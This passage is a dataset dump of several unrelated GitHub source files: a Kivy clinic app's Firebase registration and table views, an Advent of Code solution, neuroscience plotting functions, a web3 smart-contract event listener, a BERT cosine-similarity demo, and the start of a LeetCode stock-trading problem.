self.ids.lbregister_pacient.text = \"Senha precisa de pelo menos 10 caracteres\" \n\n elif cpf2 in res:\n self.ids.lbregister_pacient.text = \"CPF já cadastrado\"\n\n else:\n #requests.post(url = self.firebase_url, json = to_database2)\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbregister_pacient.text = \"Paciente cadastrado com sucesso!\"\n\n except ValueError:\n pass \n\n# Registra horários de plantão e coloca os dados diretamente no banco de dados firebase\n\ndef callbackplantao(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\ndef on_save3(self, instance, value, date_range):\n self.ids.data2.text = f'{str(date_range[0])} - {str(date_range[-1])}'\n\ndef on_cancel3(self, instance, value):\n self.ids.data2.text = \"Você cliclou em cancelar\"\n\ndef show_data_picker3(self):\n date_dialog = MDDatePicker(mode=\"range\")\n date_dialog.bind(on_save=self.on_save3, on_cancel=self.on_cancel3)\n date_dialog.open() \n\ndef create_post_hour(self, cpf_funcionario, data2, horario):\n request = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if cpf_funcionario not in res:\n self.ids.lbregister_hour.text = \"CPF não cadastrado\" \n\n elif horario == \"\":\n self.ids.lbregister_hour.text = \"Insira horário\"\n\n else:\n\n try: \n to_database = '{\"CPF funcionario\": 'f'{json.dumps(cpf_funcionario)}'', \"Data\" : 'f'{json.dumps(data2)}'', \"Horario\" : 'f'{json.dumps(horario)}''}'\n\n\n \n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbregister_hour.text = \"Horario adicionado com sucesso!\"\n\n except ValueError:\n pass \n\n\n# Cria tabela que mostra consultadas agendadas \n\nstop2 = threading.Event()\n\ndef on_stop2(self):\n self.stop2.set()\n\ndef on_enter4(self):\n self.start_second_thread()\n\ndef start_second_thread2(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data2(self, *args): \n #get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, dado in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in dado.items():\n lista.append(info)\n \n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n \n@mainthread\ndef data_table2(self, cols, values): \n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables)\n\n\n# Cria tabela que mostra retirada de medicamentos agendadas\n\nstop3 = threading.Event()\n\ndef on_stop3(self):\n self.stop3.set()\n\ndef on_enter5(self):\n self.start_second_thread()\n\ndef start_second_thread3(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data3(self, *args): \n get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, data in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in data.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n@mainthread\ndef data_table3(self, cols, values):\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables) \n\n\n# Cria tabela que mostra horarios de plantão e remove horarios\n\n\nstop4 = threading.Event()\n\ndef on_stop4(self):\n self.stop4.set()\n\ndef on_enter6(self):\n self.start_second_thread()\n\ndef start_second_thread4(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data4(self, *args): \n #firebase_url = \" \"\n #auth_key = ' ' \n if HORARIOS_SELECIONADOS:\n for h_horarios in HORARIOS_SELECIONADOS:\n post_request = requests.delete(f'/{h_horarios}/.json')\n\n get_request = requests.get(f' ')\n horarios_dado = json.loads(get_request.content.decode()) \n count = 0\n cols = [\"Código\"]\n values = []\n try:\n\n for horarios, dado in horarios_dado.items():\n lista = []\n lista.append(horarios)\n\n for key, info in dado.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n \n except AttributeError:\n pass \n\n self.data_table(cols, values) \n\ndef on_check_press(self, instance_table, current_row):\n\n '''Called when the check box in the table row is checked.'''\n if current_row[0] in HORARIOS_SELECIONADOS:\n HORARIOS_SELECIONADOS.remove(current_row[0])\n else:\n HORARIOS_SELECIONADOS.append(current_row[0])\n\n\n@mainthread\ndef data_table4(self, cols, values): \n\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.data_tables.bind(on_check_press=self.on_check_press)\n self.add_widget(self.data_tables) \n\n\n# Cria tabela que mostra os pacientes registrados\n\nstop5 = threading.Event()\n\ndef on_stop(self):\n self.stop5.set()\n\ndef on_enter7(self):\n self.start_second_thread()\n\ndef start_second_thread5(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data5(self, *args): \n get_request = requests.get(f' ')\n pacientes_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for pacientes, data in pacientes_data.items():\n lista = []\n lista.append(pacientes)\n\n for key, info in data.items():\n lista.append(info)\n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n@mainthread\ndef data_table5(self, cols, values):\n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables) \n","repo_name":"IsabellaSampaio/mobileapp-python-kivy","sub_path":"KivyApp/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":20680,"program_lang":"python","lang":"pt","doc_type":"code","stars":62,"dataset":"github-code","pt":"94"} +{"seq_id":"5291079249","text":"#! env python\n\nimport itertools\nimport functools\nimport os \n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef main():\n needed = 0\n with open(dir_path + \"/input.txt\") as f:\n for line in f.readlines():\n l,w,h = line.split('x')\n l,w,h = int(l), int(w), int(h)\n needed += 2*l*w + 2*w*h + 2*h*l\n needed += min(l*w, w*h, h*l)\n\n print(needed)\n\nif __name__ == \"__main__\":\n main()","repo_name":"okigan/adventofcode","sub_path":"2015/day02/day02a.py","file_name":"day02a.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13163479787","text":"\"\"\"\nPlotting\nThis script contains functions for\n1) Plotting results of statistical test\n - plot_test()\n2) Plotting final thesis figures\n - final_figure()\n - correlation_figure()\n3) Plotting figure subplots\n - plot_extracted_spikes()\n - plot_frames_lfp()\n - plot_frames_MUAe()\n - plot_cors()\n - plot_inter_cors()\n - plot_pca()\n - plot_spont_map()\n - plot_ori_map()\n - plot_hist()\n\nAuthors: Matěj Voldřich\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pickle\nimport helper\nimport quantities as pq\n\n\ndef plot_test(params, tag):\n \"\"\"\n Plot and save generated spontaneous map, orientation map, test results for\n each (interpolated) channel and overall test result.\n\n :param params: analysis parameters\n :param tag: test result tag\n :return:\n \"\"\"\n respath = os.path.join(params['results_path'], f\"testing_results_{tag}_{params['remove_PCA_dims']}.pkl\")\n with open(respath, \"rb\") as f:\n result = pickle.load(f)\n\n if params[\"control_type\"] == \"orientation\":\n orientations = result[\"test\"]\n spont_map = result[\"reference\"]\n else:\n orientations = result[\"reference\"]\n spont_map = result[\"test\"]\n\n monkey = tag[0]\n plt.figure(figsize=(13, 12))\n # spontaneous map\n plt.suptitle(f\"Testing results {tag}\")\n cmap = params['map_colorscheme']\n cmap = plt.get_cmap(cmap)\n cmap.set_under('lightgray')\n cmap.set_over('lightgray')\n plt.subplot(2, 2, 1)\n plt.title(f\"Spontaneous map (PCA dims [{params['remove_PCA_dims']}, {params['remove_PCA_dims'] + 1}])\")\n plt.pcolormesh(spont_map, cmap=cmap, vmin=0)\n\n # orientations\n plt.subplot(2, 2, 2)\n plt.title(f\"{monkey}{result['Array_ID']} orientations\")\n plt.pcolormesh(orientations, cmap=cmap, vmin=0)\n\n # percentiles\n plt.subplot(2, 2, 3)\n plt.title(f\"Scores percentile ({len(result['control_scores'])} controls)\")\n cmap = plt.get_cmap(\"RdBu\")\n cmap.set_under('lightgray')\n cmap.set_over('lightgray')\n plt.pcolormesh(result['percentiles'], cmap=cmap, vmin=0, vmax=100)\n\n # histogram\n plt.subplot(2, 2, 4)\n plt.title(f\"Mean score ({result['percentile']})\")\n h = plt.hist(result['control_scores'], bins=int(params['permutations'] / 20))[0]\n map_score = result['test_score']\n g = plt.plot([map_score, map_score], [0, 20], color=\"orange\")[0]\n x, y = helper.KDE(result['control_scores'], 1)\n y = y / np.max(y) * np.max(h)\n plt.plot(x, y)\n plt.legend([g], [\"Mean test score\"])\n\n plt.savefig(\n f\"{params['figures_path']}/testing/{result['method']}/{monkey}{result['Array_ID']}_{result['method']}_{params['remove_PCA_dims']}_{params['control_type'][0]}\")\n plt.close()\n\n\n# Figures in detailed analysis of L13\n# figure a) - signal, spikes, frames (MUA and nLFP)\ndef plot_extracted_spikes(bl, fs, binsize, dur=1):\n \"\"\"\n Plot frame extraction for MUA or nLFP\n :return:\n \"\"\"\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = 33\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n y = y / max(y.max(), np.abs(y.min()))\n t_start = t_start * pq.s\n\n # 1. plot signal with threshold\n offset = 3.5\n signal = y + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([0, x[-1]], [np.mean(signal), np.mean(signal)], color=\"grey\")\n # plt.plot([0, x[-1]], [y_th, y_th], color=\"red\", linestyle=\"dashed\")\n\n # 2. extracted spikes\n st = bl.segments[0].spiketrains[chn_ix]\n plt.plot([x[0], x[-1]], [2, 2], color=\"black\")\n for spike in st:\n if spike < t_start or spike > (t_start + dur * pq.s):\n continue\n spike = spike - t_start\n plt.plot([spike, spike], [1.6, 2.4], color=\"black\", linewidth=1)\n\n # 3. convert to frames\n frames = np.zeros(int(x[-1] / binsize))\n for i in range(len(frames)):\n frames[i] = len(np.where(np.logical_and((st - t_start) > (i * binsize), (st - t_start) < (i + 1) * binsize))[0])\n x = np.array(list(range(len(frames) + 1))) / len(frames) * x[-1]\n plt.plot([x[0], x[-1]], [1, 1], color=\"black\")\n plt.plot([x[0], x[-1]], [0, 0], color=\"black\")\n for i in range(len(x)):\n plt.plot([x[i], x[i]], [0, 1], color=\"black\")\n if i < len(frames):\n plt.annotate(str(frames[i].astype(int)), (x[i] + 0.05, 0.4), size=30)\n plt.ylabel(\"Frames Spikes Signal \", fontsize=18)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_frames_lfp(bl, fs, dt, dur=1):\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = np.random.randint(60)\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n signal = y / max(y.max(), np.abs(y.min()))\n\n from scipy.signal import welch\n fs = 500\n # 1. raw signal with threshold\n offset = 3.5\n signal = signal + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([0, x[-1]], [offset, offset], color=\"grey\")\n\n # 2. plot spectrogram\n frames = []\n for i in range(int(x[-1] / dt)):\n signal_part = signal[int(i * dt * fs):int((i + 1) * dt * fs)]\n frames.append(welch(signal_part.reshape(signal_part.shape[0]), fs=fs)[1][:6])\n frames = np.array(frames)\n # 1.1 to 2.4\n cmap = plt.get_cmap(\"viridis\")\n frames = frames - np.min(frames)\n frames = frames / np.max(frames)\n height = (2.4 - 1.3) / frames.shape[1]\n for i in range(frames.shape[0]):\n for j in range(frames.shape[1]):\n x1 = i * dt\n x2 = (i + 1) * dt\n y1 = j * height + 1.3\n y2 = (j + 1) * height + 1.3\n plt.fill([x1, x2, x2, x1], [y1, y1, y2, y2], color=cmap(frames[i, j]))\n\n # 3. convert to frames (total power)\n frames = np.zeros(int(x[-1] / dt))\n for i in range(len(frames)):\n signal_part = signal[int(i * dt * fs):int((i + 1) * dt * fs)]\n frames[i] = np.sum(welch(signal_part.reshape(signal_part.shape[0]), fs=fs)[1])\n frames[i] = int(frames[i] * 1000) / 100\n x = np.array(list(range(len(frames) + 1))) / len(frames) * x[-1]\n plt.plot([x[0], x[-1]], [1, 1], color=\"black\")\n plt.plot([x[0], x[-1]], [0, 0], color=\"black\")\n for i in range(len(x)):\n plt.plot([x[i], x[i]], [0, 1], color=\"black\")\n if i < len(frames):\n plt.annotate(str(frames[i]), (x[i] + 0.05, 0.4), size=23)\n plt.ylabel(\"Frames Spectrogram Signal \", fontsize=18)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_frames_MUAe(bl, fs, dur):\n # SETUP\n chn_ix = np.random.randint(64)\n t_start = np.random.randint(0, 100)\n\n y = bl.segments[0].analogsignals[0][t_start * fs:int((t_start + dur) * fs), chn_ix]\n signal = y / max(y.max(), np.abs(y.min()))\n\n # 1. raw signal with threshold\n offset = 0.7\n signal = signal + offset\n x = np.linspace(0, len(signal) / fs, len(signal))\n plt.plot(x, signal, color=\"black\")\n plt.plot([x[0], x[-1]], [np.mean(signal), np.mean(signal)], color=\"grey\")\n\n # 2. convert to frames (discrete signal)\n signal = signal - offset\n plt.scatter(x, signal, color=\"black\", s=3)\n\n plt.ylabel(\"Frames Signal\", fontsize=20)\n plt.xticks([])\n plt.yticks([])\n\n\n# figure b) - cors and inter cors\ndef plot_cors(path, chn):\n \"\"\"\n Plot correlation map\n :param path:\n :param chn:\n :return:\n \"\"\"\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n cors = data[\"correlation_maps\"]\n\n with open(\"layout.pkl\", \"rb\") as f:\n layout = pickle.load(f)\n\n corr_map = np.full((8, 8), 0.)\n for x in range(8):\n for y in range(8):\n corr_map[x, y] = cors[chn - 1, layout[x, y] - 1]\n\n plt.gca().set_aspect('equal', 'box')\n g = plt.pcolormesh(corr_map, cmap=\"RdBu_r\", vmin=-1, vmax=1)\n # plt.colorbar(g, ticks=[-1, 0, 1], shrink=0.5, pad=0.08,\n # location=\"bottom\", orientation=\"horizontal\", label=\"correlation\")\n for x in range(8):\n for y in range(8):\n if layout[x, y] == chn:\n plt.scatter(y + 0.5, x + 0.5, color=\"yellow\", edgecolors=\"black\", label=\"seed channel\")\n # plt.legend(bbox_to_anchor=(0.5, -0.1), loc='lower center', ncol=1)\n _ = plt.xticks([])\n _ = plt.yticks([])\n return g\n\n\ndef plot_inter_cors(path, chn):\n \"\"\"\n Plot interpolated correlation map with removed untunned channels\n :param path:\n :param chn:\n :return:\n \"\"\"\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n inter = data[\"interpolated_correlation_maps\"]\n rins = data[\"real_channel_inds\"]\n\n plt.gca().set_aspect('equal', 'box')\n cmap = plt.get_cmap(\"RdBu_r\").copy()\n cmap.set_under(color=\"grey\")\n inter_corr_map = inter[:, chn - 1].reshape((65, 65))\n\n plt.pcolormesh(inter_corr_map.T, cmap=cmap, vmin=-1, vmax=1)\n plt.xticks([])\n plt.yticks([])\n\n plt.scatter(rins[chn - 1, 0] + 0.5, rins[chn - 1, 1] + 0.5, color=\"yellow\", edgecolors=\"black\")\n\n\n# figure c) - pca plane\ndef plot_pca(path):\n \"\"\"\n Plot projected interpolated correlation vectors onto PCs (PCs defined by path)\n :param path:\n :return:\n \"\"\"\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n points = data[\"points_pca_plane\"]\n center = points.mean(axis=0)\n p = points - center\n angle = np.arctan(p[:, 0] / p[:, 1])\n angle[p[:, 1] < 0] += np.pi\n angle -= angle.min()\n labels = angle / 2\n g = plt.scatter(points[:, 0], points[:, 1], c=labels, cmap=\"hsv\", vmin=0, vmax=np.pi, s=25, edgecolors=\"grey\")\n cb = plt.colorbar(g, ticks=[0, 3.14], shrink=0.8, pad=0.12,\n location=\"right\", orientation=\"vertical\")\n cb.set_label(label=\"angle\", fontsize=18)\n outline = max(np.max(np.abs(points[:, 0])), np.max(np.abs(points[:, 1])))\n plt.plot([0, 0], [-outline, outline], color=\"black\")\n plt.plot([-outline, outline], [0, 0], color=\"black\")\n plt.xlabel(\"PC3\", fontsize=20)\n plt.ylabel(\"PC4\", fontsize=20)\n plt.gca().set_aspect('equal', 'box')\n plt.xticks([])\n plt.yticks([])\n\n\n# figure d) - spont. map, OP map, test\ndef plot_spont_map(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n spont = data[\"test\"]\n cmap = plt.get_cmap(\"hsv\").copy()\n cmap.set_under(color=\"grey\")\n plt.gca().set_aspect('equal', 'box')\n plt.pcolormesh(spont, cmap=cmap, vmin=0)\n plt.title(\"Spontaneous map\", fontsize=20, pad=10)\n plt.xticks([])\n plt.yticks([])\n\n\ndef plot_ori_map(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n ori = data[\"reference\"]\n cmap = plt.get_cmap(\"hsv\").copy()\n cmap.set_under(color=\"grey\")\n plt.gca().set_aspect('equal', 'box')\n plt.pcolormesh(ori, cmap=cmap, vmin=0)\n plt.title(\"Orientation preference map\", fontsize=20, pad=10)\n plt.xticks([])\n plt.yticks([])\n\n\n# figure e)\ndef plot_hist(path):\n import pickle\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n plt.title(f\"Similarity scores (p={int(data['percentile'] * 100) / (100 * 100)})\", fontsize=20, pad=10)\n h = plt.hist(data['control_scores'], bins=100, color=\"grey\")[0]\n plt.plot([data['test_score'], data['test_score']], [0, np.mean(h)], color=\"black\", linewidth=5)\n # x, y = KDE(data['control_scores'], 1)\n # y = y / np.max(y) * np.max(h)\n # plt.plot(x, y, color=\"black\")\n plt.xticks([])\n plt.yticks([])\n\n\ndef final_figure(res_path, method, monkey, arraynr, params):\n \"\"\"\n Plot figure for each method in detailed analysis of L13\n :param res_path: path to correlation maps folder\n :param method: MUA, MUAe, LFP, nLFP\n :param monkey: L or A\n :param arraynr: Array ID\n :param params:\n :return:\n \"\"\"\n # SETUP\n cors_path = f\"{res_path}/correlation_maps_pool_monkey_{monkey}{arraynr}_{method}_spont.pkl\"\n pca_path = f\"{res_path}/pca_communities_monkey_{monkey}{arraynr}_{method}_spont.pkl\"\n test_path = f\"{res_path}/testing/testing_results_{monkey}{arraynr}_{method}_{params['remove_PCA_dims']}.pkl\"\n\n # extract spikes a)\n plt.figure(figsize=(28, 16))\n from extract_signal import LFP, nLFP, MUAe, MUA\n\n # load signal\n path = \"/home/matej/Desktop/Bakalarka/final_figs/recordings/2_final_recording_after_stimulation_005.ns6\"\n if method == \"MUA\":\n fs = 30000\n bl = MUA(path, -3)\n dt = 0.1\n elif method == \"nLFP\":\n fs = 500\n bl = nLFP(path, -1)\n dt = 0.3\n elif method == \"LFP\":\n fs = 500\n bl = LFP(path)\n dt = 0.2\n elif method == \"MUAe\":\n fs = 1000\n bl = MUAe(path)\n\n # plot extracted frames (a)\n plt.subplot(2, 3, 1)\n if method in [\"MUA\", \"nLFP\"]:\n plot_extracted_spikes(bl, fs, dt, dur=1.5)\n elif method == \"LFP\":\n plot_frames_lfp(bl, fs, dt)\n if method == \"MUAe\":\n plot_frames_MUAe(bl, fs, 0.1)\n for loc in [\"left\", \"top\"]:\n plt.gca().spines[loc].set_visible(False)\n else:\n for loc in [\"left\", \"right\", \"top\", \"bottom\"]:\n plt.gca().spines[loc].set_visible(False)\n\n # plot cors and interpolated cors (b)\n chns = [32, 51]\n loc = [3, 9]\n for i in range(2):\n plt.subplot(4, 6, loc[i])\n if i == 0:\n plt.title(\"Correlation map\", fontsize=20)\n g = plot_cors(cors_path, chns[i])\n plt.subplot(4, 6, loc[i] + 1)\n if i == 0:\n plt.title(\"Interpolated map\", fontsize=20)\n plot_inter_cors(cors_path, chns[i])\n\n plt.subplot(2, 3, 1)\n axs = [plt.subplot(4, 6, loc[i] + j) for i in range(2) for j in range(2)]\n cb = plt.colorbar(g, ax=axs, ticks=[-1, 0, 1], shrink=0.8, pad=0.08,\n location=\"bottom\", orientation=\"horizontal\")\n cb.set_label(label=\"Correlation\", fontsize=16)\n\n # plot pca projection (c)\n plt.subplot(2, 3, 3)\n plot_pca(pca_path)\n\n # plot spontaneous map, orientation map and histogram (d)\n plt.subplot(2, 3, 4)\n plot_spont_map(test_path)\n plt.subplot(2, 3, 5)\n plot_ori_map(test_path)\n plt.subplot(2, 3, 6)\n plot_hist(test_path)\n\n plt.savefig(f\"final_.png\")\n\n\ndef correlation_figure(path_to_cors):\n from scipy.stats import pearsonr\n correlation_maps = {}\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n with open(f\"{path_to_cors}/correlation_maps_pool_monkey_L13_{m}_spont.pkl\", \"rb\") as f:\n correlation_maps[m] = pickle.load(f)\n\n # load channel coords\n coords = {}\n with open(\"layout.pkl\", \"rb\") as f:\n layout = pickle.load(f)\n for r in range(8):\n for c in range(8):\n coords[layout[r, c]] = (r, c)\n\n # load correlation values, CMs correlations and distances\n c, cm, d = {}, {}, {}\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n cors = correlation_maps[m][\"correlation_maps\"]\n for chn1 in range(64):\n for chn2 in range(chn1 + 1, 64):\n if chn1 == 0 and chn2 == 1:\n c[m] = []\n cm[m] = []\n d[m] = []\n c[m].append(cors[chn1, chn2])\n tmp = pearsonr(cors[:, chn1], cors[:, chn2])[0]\n cm[m].append(-2 if np.isnan(tmp) else tmp)\n d[m].append(np.linalg.norm(np.array(coords[chn1 + 1]) - np.array(coords[chn2 + 1])))\n c[m] = np.array(c[m])\n cm[m] = np.array(cm[m])\n d[m] = np.array(d[m])\n\n # create cors x cm cors line and plot it\n plt.figure(figsize=(26, 10))\n plt.subplot(1, 2, 1)\n x = {}\n y = {}\n std = {}\n segments = 40\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n x[m], y[m], std[m] = [], [], []\n x_ = c[m]\n y_ = cm[m]\n bin_x = np.linspace(np.min(x_), np.max(x_), segments)\n for j in range(bin_x.shape[0] - 1):\n tmp = y_[np.where(np.logical_and(x_ >= bin_x[j], x_ < bin_x[j + 1]))]\n if tmp.shape[0] > 0:\n x[m].append(bin_x[j] + ((bin_x[j + 1] - bin_x[j]) / 2))\n y[m].append(np.mean(tmp))\n std[m].append(np.std(tmp))\n x[m], y[m], std[m] = np.array(x[m]), np.array(y[m]), np.array(std[m])\n _ = plt.plot(x[m], y[m], label=m, linewidth=4)\n _ = plt.fill_between(x[m], y[m] - std[m], y[m] + std[m], color=(0.2, 0.4, 0.7, 0.2))\n _ = plt.xlabel(\"Channel correlations\", fontsize=25)\n _ = plt.ylabel(\"Map correlations\", fontsize=25)\n if i == 3:\n _ = plt.legend(fontsize=15)\n plt.ylim(-1, 1)\n\n # plot cors x distance\n for i in range(4):\n m = [\"MUA\", \"nLFP\", \"MUAe\", \"LFP\"][i]\n x = np.unique(d[m])\n y = np.zeros((x.shape[0], 2))\n std = np.zeros((x.shape[0], 2))\n for ix in range(x.shape[0]):\n for j in range(2):\n data = [cm[m], c[m]][j][np.where(d[m] == x[ix])]\n data = data[np.where(data >= -1)]\n y[ix, j] = np.mean(data)\n std[ix, j] = np.std(data)\n loc = [3, 4, 7, 8]\n plt.subplot(2, 4, loc[i])\n plt.plot(x, y[:, 0], color=\"red\", label=\"Map correlations\", linewidth=2)\n plt.plot(x, y[:, 1], color=\"blue\", label=\"Channel correlations\", linewidth=2)\n colors = [(255 / 256, 190 / 256, 171 / 256), (177 / 256, 201 / 256, 234 / 256)]\n for j in range(2):\n plt.fill_between(x, y[:, j] - std[:, j], y[:, j] + std[:, j], color=colors[j], alpha=0.5)\n plt.ylim(-0.4, 1)\n x = np.linspace(1, 10, 10)\n plt.xticks(x, (x * 400).astype(int))\n # plt.yticks([-1, -0.5, 0, 0.5, 1])\n plt.title(m, fontsize=20)\n if i == 0:\n plt.ylabel(\"Correlation values\", fontsize=18)\n if i == 1:\n plt.legend(fontsize=18)\n if i == 3:\n plt.xlabel(\"Distance (um)\", fontsize=18)\n plt.savefig(\"final/dist_.png\")\n","repo_name":"matejvol/spontaneous-map-inference","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":17961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39341658768","text":"import time\nfrom threading import Thread\nfrom openapi_server.contract.eventListening.abstractSubject import AbstractSubject\nfrom openapi_server.contract import contract\nimport logging\n\nlog = logging.getLogger(\"scListener\")\n\n\nclass SmartContractEventListener(AbstractSubject):\n \"\"\"\n This class is responsible for Event listening of smart contract events.\n\n Observers attach themselves to this event listener, which creates a thread each for the filtering of events.\n the update function of the affected observer is then called.\n\n It follows the observer pattern as a guideline only, since notifyObserver is not used,\n as attaching an observer starts event listening immediately, and only a single event is to be updated.\n\n The Smart Contract Event Listening using threads is based on the example of\n https://web3py.readthedocs.io/en/stable/filters.html#asynchronous-filter-polling\n \"\"\"\n\n def __init__(self, sc_contract):\n self.contract = sc_contract\n self._observer = set()\n\n # AbstractSubject overrides\n\n def attach(self, observer):\n self._observer.add(observer)\n self._evt_listen(observer)\n\n def detach(self, observer):\n self._observer.remove(observer)\n worker = observer.worker\n worker.join()\n\n def notifyObservers(self, *args, **kwargs):\n for o in self._observer:\n o.notify(self, *args, **kwargs)\n\n # ---------\n\n def _evt_listen(self, observer):\n \"\"\"\n create a contract event filter for an observer and set up a new thread to start event listening\n \"\"\"\n event = observer.event\n event_filter = self.contract.events[event].createFilter(fromBlock=\"latest\")\n worker = Thread(\n target=self._event_loop, args=(event_filter, observer), daemon=True\n )\n # store to join later\n observer.worker = worker\n worker.start()\n\n def _event_loop(self, event_filter, observer) -> None:\n \"\"\"\n gets new events based on the type of event this thread is listening to\n :param event_filter:\n :param poll_interval: int\n :return: None\n \"\"\"\n while True:\n for event in event_filter.get_new_entries():\n observer.update(event)\n time.sleep(observer.poll_interval)\n\n\neventListener = SmartContractEventListener(sc_contract=contract)\n","repo_name":"blockchain-v/bcv-backend","sub_path":"openapi_server/contract/eventListening/eventListenerSubject.py","file_name":"eventListenerSubject.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12296587066","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_text as text\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ntext_input = tf.keras.layers.Input(shape=(), dtype=tf.string)\npreprocessor = hub.KerasLayer(\"https://tfhub.dev/tensorflow/bert_en_uncased_preprocess/3\")\nencoder_inputs = preprocessor(text_input)\nencoder = hub.KerasLayer(\"https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/3\", trainable=True)\noutputs = encoder(encoder_inputs)\npooled_output = outputs[\"pooled_output\"]\nsequence_output = outputs[\"sequence_output\"]\n\nembedding_model = tf.keras.Model(text_input, pooled_output)\n\nquery = tf.constant([\"brain\"])\nquery_embedding = embedding_model(query).numpy()\nprint(query_embedding)\n\ndocuments = [\n { 'id': 1, 'text': \"cardiac surgeon\" },\n { 'id': 2, 'text': \"neuroscientist\" },\n { 'id': 3, 'text': \"brain surgeon\" }\n]\nprint(documents)\n\ndocument_embeddings = list(\n map(lambda doc:\n { 'id': doc['id'], 'text': embedding_model(tf.constant([doc['text']]).numpy()) },\n documents\n )\n)\nprint(document_embeddings)\n\ncosine_similarities = list(\n map(lambda doc:\n { 'id': doc['id'], 'score': cosine_similarity(query_embedding, doc['text'])[0][0] },\n document_embeddings\n )\n)\nprint(cosine_similarities)\n\ncosine_similarities.sort(key = lambda doc: doc['score'], reverse=True)\nprint(cosine_similarities)\n\nprint(\"Documents:\")\nprint(documents)\n\nresults = list(\n map(lambda score:\n { 'id': score['id'], 'text': list(map(lambda doc: doc['text'], filter(lambda doc: doc['id'] == score['id'], documents)))[0] },\n cosine_similarities\n )\n)\nprint(\"\")\nprint(\"Ranked by most similar to search query: '\" + query.numpy()[0].decode('ascii') + \"'\")\nprint(results)\n","repo_name":"mattmoore/ai-playground","sub_path":"nlp/bert-embedding/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29545074201","text":"#\n# @lc app=leetcode id=123 lang=python3\n#\n# [123] Best Time to Buy and Sell Stock III\n#\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/description/\n#\n# algorithms\n# Hard (34.68%)\n# Likes: 1378\n# Dislikes: 58\n# Total Accepted: 169.9K\n# Total Submissions: 485.3K\n# Testcase Example: '[3,3,5,0,0,3,1,4]'\n#\n# Say you have an array for which the i^th element is the price of a given\n# stock on day i.\n#\n# Design an algorithm to find the maximum profit. You may complete at most two\n# transactions.\n#\n# Note: You may not engage in multiple transactions at the same time (i.e., you\n# must sell the stock before you buy again).\n#\n# Example 1:\n#\n#\n# Input: [3,3,5,0,0,3,1,4]\n# Output: 6\n# Explanation: Buy on day 4 (price = 0) and 